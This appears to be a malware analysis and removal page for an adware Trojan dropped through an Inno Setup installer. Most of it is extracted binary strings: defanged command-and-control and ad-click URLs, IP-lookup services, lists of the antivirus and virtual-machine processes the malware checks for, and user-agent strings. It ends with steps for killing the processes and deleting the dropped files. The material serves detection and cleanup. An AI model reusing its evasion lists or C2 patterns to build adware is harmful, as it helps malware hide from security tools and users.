(%d),XC_PIER,ID(%d),bShow(%d)

(%d),XC_BUTTON_MENU,ID(%d),bShow(%d)

(%d),XC_VIRTUAL_ELE,ID(%d),bShow(%d)

(%d),XC_BUTTON_MIN,ID(%d),bShow(%d)

(%d),XC_BUTTON_MAX,ID(%d),bShow(%d)

(%d),XC_BUTTON_CLOSE,ID(%d),bShow(%d)

(%d),XC_TREE_SUPER,ID(%d),bShow(%d)

left:%d , top:%d , right:%d , bottom:%d

title=%s

mscoree.dll

- floating point support not loaded

- CRT not initialized

- Attempt to initialize the CRT more than once.

ADVAPI32.DLL

portuguese-brazilian

USER32.DLL

n.exe

combase.dll

advapi32.dll

hXXp://xiaobingdou.com/online.aspx

hXXp://pop.yeaplayer.com/click.aspx

res://ieframe.dll/navcancl.htm#

iframe.htm

hXXp://VVV.googleadservices.com

hXXp://googleads.g.doubleclick.net

webad.xml

hXXp://xiaobingdou.com/anzhuang.aspx

bhXXp://xiaobingdou.com/jihuo.aspx

%d, %s

delete%s

%d,%s

hXXp://xiaobingdou.com/jihuo.aspx

"%s" %s

32:HKEY_CURRENT_USER\Software\%s\actv;64:HKEY_CURRENT_USER\Software\%s\actv

HKEY_CURRENT_USER\Software\%s\actv

%spopnew.xml

dhXXp://pop.yeaplayer.com/get.aspx

bhXXp://click_pop_exit_btn.com2

%s...

QQ.exe

procexp.exe

taskmgr.exe

AvastUI.exe

Firefox

opera

Chrome

twchrome

360chrome

User-Agent:Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50

User-Agent:Mozilla/5.0 (Windows; U; Windows NT 6.1; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50

User-Agent:Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

User-Agent:Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)

User-Agent:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1

User-Agent:Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1

User-Agent:Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; en) Presto/2.8.131 Version/11.11

User-Agent:Opera/9.80 (Windows NT 6.1; U; en) Presto/2.8.131 Version/11.11

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon 2.0)

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; TencentTraveler 4.0)

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)

sUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser)

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko

%s\%.4d-%.2d-%.2d %.2d.%.2d.%.2d.log

s%s\%.4d-%.2d-%.2d %.2d.%.2d.%.2d.log

YeapUserInfo.ini

swapfile.ini

d\

GOOGLE CHROME

WebOptimum

EXPLORER.EXE

setup.exe

"%s" /UPGRADE:"%s"

"%s" /UPGRADE:FINSIH

hXXp://1212.ip138.com/ic.asp

hXXp://VVV.ip-adress.com/

/iplookup/iplookup.php

hXXp://int.dpool.sina.com.cn

?h=X-X-X-X-X-X&r=%s_%s%s&a=%d&rt=%d --- adadsada

?h=X-X-X-X-X-X&r=%s_%s%s&a=%d --- adadsada

TEST%d

hXXp://int.dpool.sina.com.cn/iplookup/iplookup.php?ip=

hXXp://ip138.com/ips138.asp?ip=

hXXp://cdn3.optimizely.com/js/geo2.js

hXXp://software77.net/geo-ip/

config.yeadesktop.com

down.yeadesktop.com

Download failed:%d

cmd /C %s

ndddddd

Mddddd

VBoxTray.exe

VBoxService.exe

VMwareUser.exe

VMwareTray.exe

VMUpgradeHelper.exe

vmtoolsd.exe

vmacthlp.exe

Nekrn.exe

BaiduAn.exe

BaiduSd.exe

360sd.exe

360rp.exe

360Safe.exe

360tray.exe

avguard.exe

avp.exe

avgui.exe

BavSvc.exe

rstray.exe

SSScheduler.exe

ccSvcHst.exe

KVwsc.exe

FilMsg.exe

secenter.exe

coreServiceShell.exe

Portuguese(Brazilian)

Portuguese(Standard)

\StringFileInfo\x\%s

#{ad498944-762f-11d0-8dcb-00c04fc3358c}

000000000000000

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\00026403\

siql.exe

ppData\Local\Temp\00026416\popnew.xml

1.0.1.32

webfriend2.exe_2756:

.idata

.rdata

P.reloc

P.rsrc

kernel32.dll

uxtheme.dll

userenv.dll

setupapi.dll

apphelp.dll

propsys.dll

dwmapi.dll

cryptbase.dll

oleacc.dll

version.dll

profapi.dll

comres.dll

clbcatq.dll

.DEFAULT\Control Panel\International

File I/O error %d

lzmadecompsmall: Compressed data is corrupted (%d)

lzmadecompsmall: %s

LzmaDecode failed (%d)

shell32.dll

/SUPPRESSMSGBOXES

/PASSWORD=password

Specifies the password to use.

For more detailed information, please visit hXXp://VVV.jrsoftware.org/ishelp/index.php?topic=setupcmdline

/SL5="$%x,%d,%d,

Inno Setup Setup Data (5.5.7)

Inno Setup Messages (5.5.3)

mu2.iu

user32.dll

oleaut32.dll

advapi32.dll

RegOpenKeyExA

RegCloseKey

GetWindowsDirectoryA

MsgWaitForMultipleObjects

ExitWindowsEx

comctl32.dll

name="JR.Inno.Setup"

version="1.0.0.0"

name="Microsoft.Windows.Common-Controls"

version="6.0.0.0"

publicKeyToken="6595b64144ccf1df"

<requestedExecutionLevel level="asInvoker" uiAccess="false"/>

<windowsSettings>

<dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>

</windowsSettings>

<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>

<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>

<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>

<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>

<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>

!'%s' is not a valid integer value('%s' is not a valid floating point value

'%s' is not a valid date

'%s' is not a valid time!'%s' is not a valid date and time

I/O error %d

Integer overflow Invalid floating point operation

Invalid pointer operation

Invalid class typecast0Access violation at address %p. %s of address %p

Operation aborted%Exception %s in module %s at %p.

Application Error1Format '%s' invalid or incompatible with argument

No argument for format '%s'

Invalid variant operation"Variant method calls not supported

External exception %x

1.0.0.0

1.0.0.0

webfriend2.tmp_2704:

.idata

.rdata

P.reloc

P.rsrc

kernel32.dll

uxtheme.dll

userenv.dll

setupapi.dll

apphelp.dll

propsys.dll

dwmapi.dll

cryptbase.dll

oleacc.dll

version.dll

profapi.dll

comres.dll

clbcatq.dll

%s_%d

EInvalidOperation

TKeyEvent

TKeyPressEvent

crSQLWait

t.HtR

EInvalidGraphicOperation

TWindowState

poProportional

KeyPreviewT

WindowState`

OnKeyDownD1A

OnKeyPress

OnKeyUp\0A

CTL3D32.DLL

PasswordCharD

ssHorizontal

OnKeyUp

RegDeleteKeyExA

advapi32.dll

.DEFAULT\Control Panel\International

user32.dll

shlwapi.dll

TPSExec

TPSRuntimeClassImporter

TPSExportedVar

Cannot Import

Interface not supported

TPSCustomDebugExec

TPSDebugExec

RICHED20.DLL

RICHED32.DLL

Rstrtmgr.dll

File I/O error %d

Messages file "%s" is missing. Please correct the problem or obtain a new copy of the program.

shell32.dll

HKEY_CLASSES_ROOT

HKEY_CURRENT_USER

HKEY_LOCAL_MACHINE

HKEY_USERS

HKEY_PERFORMANCE_DATA

HKEY_CURRENT_CONFIG

HKEY_DYN_DATA

WININIT.INI

t.Htb

Software\Microsoft\Windows\CurrentVersion\SharedDLLs

RegCreateKeyEx

RegOpenKeyEx

sfc.dll

cmd.exe" /C "

COMMAND.COM" /C

PendingFileRenameOperations

PendingFileRenameOperations2

Software\Microsoft\Windows\CurrentVersion\Fonts

Software\Microsoft\Windows NT\CurrentVersion\Fonts

IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning)

IPropertyStore::SetValue(PKEY_AppUserModel_ID)

IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall)

IPropertyStore::SetValue(PKEY_AppUserModel_StartPinOption)

OLEAUT32.DLL

Log opened. (Time zone: UTC%s%.2u:%.2u)

%s Log %s #%.3u.txt

MsgWaitForMultipleObjects

regsvr32.exe"

Cannot register 64-bit DLLs on this version of Windows

HELPER_EXE_AMD64

Cannot utilize 64-bit features on this version of Windows

64-bit helper EXE wasn't extracted

\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x

CreateNamedPipe

SetNamedPipeHandleState

helper %d 0x%x

Helper process PID: %u

Stopping 64-bit helper process. (PID: %u)

Helper process exited with failure code: 0x%x

TransactNamedPipe

TransactNamedPipe/GetOverlappedResult

Helper: Command did not execute

SOFTWARE\Microsoft\.NETFramework

.NET Framework not found

SOFTWARE\Microsoft\.NETFramework\Policy\v4.0

v4.0.30319

SOFTWARE\Microsoft\.NETFramework\Policy\v2.0

v2.0.50727

SOFTWARE\Microsoft\.NETFramework\Policy\v1.1

v1.1.4322

.NET Framework version %s not found

Fusion.dll

Failed to load .NET Framework DLL "%s"

Failed to get address of .NET Framework CreateAssemblyCache function

.NET Framework CreateAssemblyCache function failed

MoveFileEx failed (%d).

Deleting directory: %s

Failed to delete directory (%d). Will retry later.

Failed to delete directory (%d). Will delete on restart (if empty).

Failed to delete directory (%d).

Deleting file: %s

Failed to delete the file; it may be in use (%d).

ExtractRecData: Unicode data unsupported by this build

The file appears to be in use (%d). Will delete on restart.

Decrementing shared count (%d-bit): %s

Unregistering 64-bit DLL/OCX: %s

Unregistering 32-bit DLL/OCX: %s

Not unregistering DLL/OCX again: %s

Unregistering 64-bit type library: %s

Unregistering 32-bit type library: %s

Uninstalling from GAC: %s

Running Exec filename:

Running Exec parameters:

CreateProcess failed (%d).

Process exit code: %u

Running ShellExec filename:

Running ShellExec parameters:

ShellExecuteEx failed (%d).

Skipping RunOnceId "%s" filename: %s

Unregistering font: %s

zlib: Internal error. Code %d

1.2.1

bzlib: Internal error. Code %d

lzmadecomp: %s

lzmadecomp: Compressed data is corrupted (%d)

DecodeToBuf failed (%d)

UhQ%F

Uh$%F

TPasswordEdit

PasswordEdit(

PasswordD

c:\directory

Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced

Uhß

PasswordPage

PasswordLabel

PasswordEdit

PasswordEditLabel$

Could not find page with ID %d

Software\Microsoft\Windows\CurrentVersion\Uninstall

%s\%s_is1

RestartManager found an application using one of our files: %s

Can use RestartManager to avoid reboot? %s (%d)

CheckPassword

PrepareToInstall failed: %s

Need to restart Windows? %s

/:*?"<>|

\/:*?"<>|

%s-%d.bin

%s-%d%s.bin

..\DISK%d\

Asking user for new disk containing "%s".

Cannot read an encrypted file before the key has been set

LoggedMsgBox returned an unexpected value. Assuming Abort.

Software\Microsoft\Windows\CurrentVersion\Uninstall\

5.5.9 (a)

URLInfoAbout

URLUpdateInfo

Creating directory: %s

Setting permissions on directory: %s

Failed to set permissions on directory (%d).

Setting NTFS compression on directory: %s

Unsetting NTFS compression on directory: %s

Failed to set NTFS compression state (%d).

IMsg

Failed to set value in Fonts registry key.

Failed to open Fonts registry key.

Setting permissions on file: %s

Failed to set permissions on file (%d).

Setting NTFS compression on file: %s

Unsetting NTFS compression on file: %s

%s: The existing file appears to be in use (%d). Will replace on restart.

%s: The existing file appears to be in use (%d). Retrying.

Dest filename: %s

Dest file is protected by Windows File Protection.

Time stamp of our file: %s

Time stamp of existing file: %s

Version of our file: %u.%u.%u.%u

Version of existing file: %u.%u.%u.%u

Existing file is protected by Windows File Protection. Skipping.

Uninstaller requires administrator: %s

Registering file as a font ("%s")

Cannot install files to 64-bit locations on this version of Windows

desktop.ini

.ShellClassInfo

{0AFACED1-E828-11D1-9187-B532F1E9575D}

target.lnk

Desktop.ini

Software\Microsoft\Windows\CurrentVersion\App Paths\

Section: %s

Entry: %s

Value: %s

Updating the .INI file.

Successfully updated the .INI file.

Skipping updating the .INI file, only updating uninstall log.

Setting permissions on registry key: %s\%s

Could not set permissions on the registry key because it currently does not exist.

Failed to set permissions on registry key (%d).

Cannot access 64-bit registry keys on this version of Windows

Registration executable created: %s

Software\Microsoft\Windows\CurrentVersion\RunOnce

Registering 64-bit DLL/OCX: %s

Registering 32-bit DLL/OCX: %s

Registering 64-bit type library: %s

Registering 32-bit type library: %s

Directory for uninstall files: %s

Will append to existing uninstall log: %s

Will overwrite existing uninstall log: %s

Creating new uninstall log: %s

LoggedMsgBox returned an unexpected value. Assuming Cancel.

RmShutdown returned an error: %d

Fatal exception during installation process (%s):

ExtractTemporaryFile: The file "%s" was not found

ExtractTemporaryFiles: No files matching "%s" found

Invalid symbol '%s' found

Invalid token '%s' found

QuerySpawnServer: Unexpected response: $%x

CallSpawnServer: Unexpected response: $%x

CallSpawnServer: Unexpected status: %d

ShellExecuteEx

ShellExecuteEx returned hProcess=0

Wnd=$%x

FormKeyDown

PasswordCheckHash

Expression error '%s'

Password

SuppressMsgBoxes

Cannot evaluate "%s" constant during Uninstall

Cannot access a 64-bit key in a "reg" constant on this version of Windows

Unknown custom message name "%s" in "cm" constant

srcexe

Cannot expand "pf64" constant on this version of Windows

Cannot expand "cf64" constant on this version of Windows

uninstallexe

Cannot expand "dotnet2064" constant on this version of Windows

Cannot expand "dotnet4064" constant on this version of Windows

Failed to expand shell folder constant "%s"

Unknown constant "%s"

Software\Microsoft\Windows\CurrentVersion

SOFTWARE\Microsoft\Windows NT\CurrentVersion

cmd.exe

COMMAND.COM

\_setup64.tmp

shfolder.dll

_isetup\_shfoldr.dll

Failed to load DLL "%s"

Found pending rename or delete that matches one of our files: %s

Windows version: %u.%u.%u%s (NT platform: %s)

64-bit Windows: %s

Processor architecture: %s

Defaulting to %s for suppressed message box (%s):

Message box (%s):

User chose %s.

MsgBox failed.

/SPAWNWND=$%x /NOTIFYWND=$%x

64-bit install mode: %s

Windows

_isetup\_isdecmp.dll

_isetup\_iscrypt.dll

/Password=

/SuppressMsgBoxes

/DETACHEDMSG

-0.bin

Setup version: Inno Setup version 5.5.9 (a)

Original Setup EXE:

Not restarting Windows because Setup is being run from the debugger.

Restarting Windows.

Inno Setup version 5.5.9 (a)

Portions Copyright (C) 2000-2016 Martijn Laan

hXXp://VVV.innosetup.com/

hXXp://VVV.remobjects.com/ps

Cannot run files in 64-bit locations on this version of Windows

Type: Exec

Type: ShellExec

RmRestart returned an error: %d

Need to restart Windows, not attempting to restart applications

Will not restart Windows automatically.

System\CurrentControlSet\Control\Windows

TOutputMsgWizardPage

TOutputMsgMemoWizardPage

PasswordEdit

PasswordEditLabel

MsgLabel

Msg1Label

Msg2Label

function CreateOutputMsgPage(const AfterID: Integer; const ACaption, ADescription, AMsg: String): TOutputMsgWizardPage;

function CreateOutputMsgMemoPage(const AfterID: Integer; const ACaption, ADescription, ASubCaption: String; const AMsg: AnsiString): TOutputMsgMemoWizardPage;

function MsgBox(const Text: String; const Typ: TMsgBoxType; const Buttons: Integer): Integer;

function GetIniString(const Section, Key, Default, Filename: String): String;

function GetIniInt(const Section, Key: String; const Default, Min, Max: Longint; const Filename: String): Longint;

function GetIniBool(const Section, Key: String; const Default: Boolean; const Filename: String): Boolean;

function IniKeyExists(const Section, Key, Filename: String): Boolean;

function SetIniString(const Section, Key, Value, Filename: String): Boolean;

function SetIniInt(const Section, Key: String; const Value: Longint; const Filename: String): Boolean;

function SetIniBool(const Section, Key: String; const Value: Boolean; const Filename: String): Boolean;

procedure DeleteIniEntry(const Section, Key, Filename: String);

function GetCmdTail: String;

function StringChangeEx(var S: String; const FromStr, ToStr: String; const SupportDBCS: Boolean): Integer;

function RegValueExists(const RootKey: Integer; const SubKeyName, ValueName: String): Boolean;

function RegQueryStringValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultStr: String): Boolean;

function RegQueryMultiStringValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultStr: String): Boolean;

function RegDeleteKeyIncludingSubkeys(const RootKey: Integer; const SubkeyName: String): Boolean;

function RegDeleteKeyIfEmpty(const RootKey: Integer; const SubkeyName: String): Boolean;

function RegKeyExists(const RootKey: Integer; const SubKeyName: String): Boolean;

function RegDeleteValue(const RootKey: Integer; const SubKeyName, ValueName: String): Boolean;

function RegGetSubkeyNames(const RootKey: Integer; const SubKeyName: String; var Names: TArrayOfString): Boolean;

function RegGetValueNames(const RootKey: Integer; const SubKeyName: String; var Names: TArrayOfString): Boolean;

function RegQueryDWordValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultDWord: Cardinal): Boolean;

function RegQueryBinaryValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultStr: AnsiString): Boolean;

function RegWriteStringValue(const RootKey: Integer; const SubKeyName, ValueName, Data: String): Boolean;

function RegWriteExpandStringValue(const RootKey: Integer; const SubKeyName, ValueName, Data: String): Boolean;

function RegWriteMultiStringValue(const RootKey: Integer; const SubKeyName, ValueName, Data: String): Boolean;

function RegWriteDWordValue(const RootKey: Integer; const SubKeyName, ValueName: String; const Data: Cardinal): Boolean;

function RegWriteBinaryValue(const RootKey: Integer; const SubKeyName, ValueName: String; const Data: AnsiString): Boolean;

function CheckForMutexes(Mutexes: String): Boolean;

function Exec(const Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ResultCode: Integer): Boolean;

function ExecAsOriginalUser(const Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ResultCode: Integer): Boolean;

function ShellExec(const Verb, Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ErrorCode: Integer): Boolean;

function ShellExecAsOriginalUser(const Verb, Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ErrorCode: Integer): Boolean;

function MakePendingFileRenameOperationsChecksum: String;

function CreateShellLink(const Filename, Description, ShortcutTo, Parameters, WorkingDir, IconFilename: String; const IconIndex, ShowCmd: Integer): String;

function ExitSetupMsgBox: Boolean;

function GetWindowsVersion: Cardinal;

procedure GetWindowsVersionEx(var Version: TWindowsVersion);

function GetWindowsVersionString: String;

function SuppressibleMsgBox(const Text: String; const Typ: TMsgBoxType; const Buttons, Default: Integer): Integer;

function CustomMessage(const MsgName: String): String;

function SendMessage(const Wnd: HWND; const Msg, WParam, LParam: Longint): Longint;

function PostMessage(const Wnd: HWND; const Msg, WParam, LParam: Longint): Boolean;

function SendNotifyMessage(const Wnd: HWND; const Msg, WParam, LParam: Longint): Boolean;

function SendBroadcastMessage(const Msg, WParam, LParam: Longint): Longint;

function PostBroadcastMessage(const Msg, WParam, LParam: Longint): Boolean;

function SendBroadcastNotifyMessage(const Msg, WParam, LParam: Longint): Boolean;

procedure RaiseException(const Msg: String);

function SetPreviousData(const PreviousDataKey: Integer; const ValueName, ValueData: String): Boolean;

Cannot call "%s" function during Setup

Cannot call "%s" function during Uninstall

Cannot call "%s" function during non Unicode Setup or Uninstall

CREATEOUTPUTMSGPAGE

CREATEOUTPUTMSGMEMOPAGE

MSGBOX

Invalid RootKey value

INIKEYEXISTS

GETCMDTAIL

REGKEYEXISTS

REGDELETEKEYINCLUDINGSUBKEYS

REGDELETEKEYIFEMPTY

REGGETSUBKEYNAMES

CHECKFORMUTEXES

SHELLEXEC

SHELLEXECASORIGINALUSER

MAKEPENDINGFILERENAMEOPERATIONSCHECKSUM

Unknown custom message name "%s"

EXITSETUPMSGBOX

GETWINDOWSVERSION

GETWINDOWSVERSIONSTRING

%u.%.2u.%u

SUPPRESSIBLEMSGBOX

%u.%u.%u.%u

Cannot disable FS redirection on this version of Windows

GetWindowsVersionEx

Runtime Error (at %d:%d):

Exception "%s" at address %p

TScriptRunner.SetPSExecParameters: Invalid type

TScriptRunner.LoadScript failed

Remove shared file %s? User chose %s%s

/INITPROCWND=$%x

/SECONDPHASE="%s" /FIRSTPHASEWND=$%x

Original Uninstall EXE:

Install was done in 64-bit mode but not running 64-bit Windows now

Removed all? %s

Not restarting Windows because Uninstall is being run from the debugger.

IMsgt

isRS-???.tmp

isRS-%.3u.tmp

DisableProcessWindowsGhosting

FTPF0P

0123456789abcdefInno Setup Setup Data (5.5.7)

Inno Setup Messages (5.5.3)

0ku2.iu

oleaut32.dll

RegQueryInfoKeyA

RegOpenKeyExA

RegEnumKeyExA

RegDeleteKeyA

RegCreateKeyExA

RegCloseKey

GetWindowsDirectoryA

CreateNamedPipeA

mpr.dll

gdi32.dll

SetViewportOrgEx

UnhookWindowsHookEx

SetWindowsHookExA

MapVirtualKeyA

GetKeyState

GetKeyNameTextA

ExitWindowsEx

EnumWindows

EnumThreadWindows

comctl32.dll

ole32.dll

ShellExecuteExA

ShellExecuteA

comdlg32.dll

msimg32.dll

.text

`.rdata

@.data

.pdata

@.rsrc

COMCTL32.dll

SHLWAPI.dll

SetProcessShutdownParameters

KERNEL32.dll

ADVAPI32.dll

SHELL32.dll

OLEAUT32.dll

<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></supportedOS><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"></supportedOS><supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"></supportedOS><supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"></supportedOS></application></compatibility></assembly>PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXMZ

`.data

.rsrc

@.reloc

Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders

Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders

SOFTWARE\Microsoft\Windows\CurrentVersion

Software\Microsoft\Windows\CurrentVersion\ProfileReconciliation

RegKey

GetWindowsDirectoryW

RegOpenKeyA

SHFOLDER.dll

dll\shfolder.dbg

Font.Color

Font.Height

Font.Name

Font.Style

OnKeyDown

Lines.Strings

name="JR.Inno.Setup"

version="1.0.0.0"

name="Microsoft.Windows.Common-Controls"

version="6.0.0.0"

publicKeyToken="6595b64144ccf1df"

<requestedExecutionLevel level="asInvoker" uiAccess="false"/>

<windowsSettings>

<dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>

</windowsSettings>

<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>

<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>

<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>

<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>

<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>

Cannot assign a %s to a %s

Cannot create file %s

Cannot open file %s

Stream write error Out of memory while expanding memory stream*Can't write to a read-only resource stream.WriteObject called twice for the same instance

Class %s not found

Resource %s not found!Resource %s is of incorrect class

List index out of bounds Operation not allowed on sorted string list%String list does not allow duplicates

Tab index out of bounds#A component named %s already exists$''%s'' is not a valid component name

A class named %s already exists#''%s'' is not a valid integer value

Error reading %s.%s: %s

Ancestor for '%s' not found

Bitmap is empty!Cannot change the size of an icon$Unknown picture file extension (.%s)

Unsupported clipboard format

Error creating window Cannot focus a disabled or invisible window!Control '%s' has no parent window

%s property out of range

%s on %s@GroupIndex cannot be less than a previous menu item's GroupIndex2Cannot have more than one MDI form per application

Could not load CARDS.DLL

Duplicate CardId found"An error returned from DDE ($0%x)/DDE Error - conversation not established ($0%x)0Error occurred when DDE ran out of memory ($0%x)"Unable to connect DDE conversation

Grid too large for operation Too many rows or columns deleted

%s on line %d

''%s'' expected

%s expected

Invalid input value7Invalid input value. Use escape key to abandon changes

Value must be between %d and %d<Cannot create a default method name for an unnamed component

''%s'' is not a valid date

''%s'' is not a valid time#''%s'' is not a valid date and time

Invalid file name - %s

All files (*.*)|*.*

&Files: (*.*)

Invalid clipboard format Clipboard does not support Icons

Custom Colors Operation not supported on selected printer.There is no default printer currently selected

Unable to write to %s

Invalid data type for '%s'

Failed to create key %s

Failed to set data for '%s'

Failed to get data for '%s'9Synchronize called when main VCL thread in a WaitFor call0Unknown RichEdit conversion file extension (.%s)

/Menu '%s' is already being used by another form

Failed to Save Stream)StatusBar cannot have more than 64 panels!Error assigning Hot-Key to %s. %s

Hot-Key is invalid#Window is invalid or a child window%Hot-Key is assigned to another window %s is already associated with %s!'%s' is not a valid integer value('%s' is not a valid floating point value

'%s' is not a valid date

'%s' is not a valid time!'%s' is not a valid date and time

I/O error %d

Integer overflow Invalid floating point operation

Invalid pointer operation

Invalid class typecast0Access violation at address %p. %s of address %p

Operation aborted%Exception %s in module %s at %p.

Application Error1Format '%s' invalid or incompatible with argument

No argument for format '%s'

Invalid variant operation"Variant method calls not supported

External exception %x

n%USERPROFILE%

r%SYSTEMROOT%

5.50.4807.2300

Microsoft(R) Windows (R) 2000 Operating System

Datos de programa%Configuraci

51.52.0.0

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Terminate malicious process(es) (How to End a Process With the Task Manager):

20002.exe:3588
20002.exe:284
webfriend2.exe:2756
%original file name%.exe:3380
msiql.exe:1660
msiql.exe:3536
rundll32.exe:2532
Delete the original Trojan file.
Delete or disinfect the following files created/modified by the Trojan:

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\img\amazon-jp.png (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\build\tap.js (6360 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\img\amazon.png (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\img\letian.png (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\xmlconfig\uninstall.xml (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\sec_setting.json (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\btn_cancel.png (16 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\progress_bar.png (2392 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\background.html (211 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\bg_install.png (2392 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\logo-64x64.png (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\htfixfunction.dll (8184 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\build\constant.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\build\background.js (3312 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\xmlconfig\riliclient.xml (532 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\extensionWarn.js (5520 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\btn_ok.png (16 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\img\ebay.png (11 bytes)
